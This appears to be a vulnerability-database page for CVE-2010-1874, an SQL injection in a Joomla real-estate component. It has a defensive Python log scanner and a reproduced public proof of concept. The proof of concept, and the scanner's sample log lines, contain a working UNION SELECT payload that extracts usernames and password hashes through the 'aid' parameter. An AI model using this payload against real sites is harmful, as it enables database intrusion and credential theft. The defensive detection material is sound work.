CVE-2010-1874

high
Published 2010-05-12 · Modified 2026-04-29
CVSS v3: n/a
CVSS v4: n/a (not yet in upstream)
VIR risk: 8.5

Description

SQL injection vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to execute arbitrary SQL commands via the aid parameter in an agentlisting action to index.php. NOTE: some of these details are obtained from third party information.
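
A defender-side check for the request shape in the description, added here as an example and not part of the CVE record or the component's own code: it flags access-log requests to the agentlisting action whose aid value is not a plain integer. The combined log format, the integer-only assumption for aid, and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate agent id is a short unsigned decimal integer.
VALID_AID_RE = re.compile(r"[0-9]{1,10}")

def suspicious_aid(url):
    """Return the offending aid value if the request targets the
    com_properties agentlisting action with a non-integer aid, else None."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if query.get("option", [""])[-1].lower() != "com_properties":
        return None
    if query.get("task", [""])[-1].lower() != "agentlisting":
        return None
    # Check every occurrence, since a request can repeat the parameter.
    for value in query.get("aid", []):
        if not VALID_AID_RE.fullmatch(value):
            return value
    return None

def scan(log_lines):
    """Yield (line_number, decoded_aid_value) for each flagged log line."""
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            bad = suspicious_aid(match.group(1))
            if bad is not None:
                yield number, bad

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/May/2010:10:00:01 +0000] "GET /index.php?option=com_properties&task=agentlisting&aid=7 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [12/May/2010:10:00:09 +0000] "GET /index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,version() HTTP/1.1" 200 9811',
    '192.0.2.44 - - [12/May/2010:10:00:15 +0000] "GET /index.php?option=com_properties&task=agentlisting&aid=7%20or%201=1 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [12/May/2010:10:00:20 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-integer aid {value!r}")
```

The same integer-only rule can be enforced in front of the application (for example in a reverse proxy or WAF rule) while the component remains unpatched.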

Predictions

Exploit likelihood: 20%
Patch ETA: n/a

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.


Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-12136 webapps php text · 2 KB
c4uR · 2010-04-10

Joomla! Component Real Estate Property 3.1.22-03 - 'aid' SQL Injection

text exploit Source: Exploit-DB
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Author: c4uR [caurcdma@yahoo.com]
Date: April, 10-2010 [INDONESIA]
Exploit Title: Joomla Component com_properties[aid] SQL Injection Vulnerability

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

###################################################################################

+++ Vulnerable File +++
       http://127.0.0.1/index.php?option=com_properties&task=agentlisting&aid=[gubr4k]

+++ ExploiT +++
       -91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,password,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--

+++ Example +++
       http://127.0.0.1/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,password,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--



###################################################################################

----------------------------------------------------------------------------------

DEVILZC0DE.ORG + INDONESIANHACKER.ORG + HACKER-NEWBIE.ORG + YOGYACARDERLINK.WEB.ID
hashkiller.com + insidepro.com + xaknet.ru + turkishajan.com

----------------------------------------------------------------------------------

[ thnx to ]

[+] Apartement Griya Semanggi + poisonV
[+] Indonesia never dies, even though it is sometimes gloomy

Application impact

Vendor | Product | Versions | Fixed
com-property | com_properties | 3.1.22-03 |
joomla joomlajoomla\!

References

CWEs

CWE-89
